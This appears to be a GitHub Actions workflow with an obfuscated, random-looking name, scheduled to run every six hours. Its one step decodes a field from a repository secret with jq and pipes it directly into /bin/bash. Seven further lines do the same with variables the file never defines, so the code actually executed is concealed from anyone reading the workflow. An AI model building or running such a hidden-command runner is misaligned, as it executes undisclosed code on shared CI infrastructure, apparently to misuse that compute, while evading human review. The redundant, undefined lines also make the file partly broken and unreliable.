name: wangxianglong4567
on:
  workflow_dispatch:
  schedule:
    - cron: '24 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: wangxianglong4567
        env:
          jvww84: ${{ secrets.jvww84 }}
        run: |
          echo $jvww84 | jq -r .owg197 | /bin/bash
          echo $bofmj1 | jq -r .yrg2300 | /bin/bash
          echo $q59 | jq -r .a428 | /bin/bash
          echo $rzlu32697 | jq -r .xfyio47 | /bin/bash
          echo $olp2326 | jq -r .lhkg72 | /bin/bash
          echo $ccs2225 | jq -r .v1 | /bin/bash
          echo $tf475 | jq -r .if3 | /bin/bash
          echo $afl4 | jq -r .uoyza582 | /bin/bash

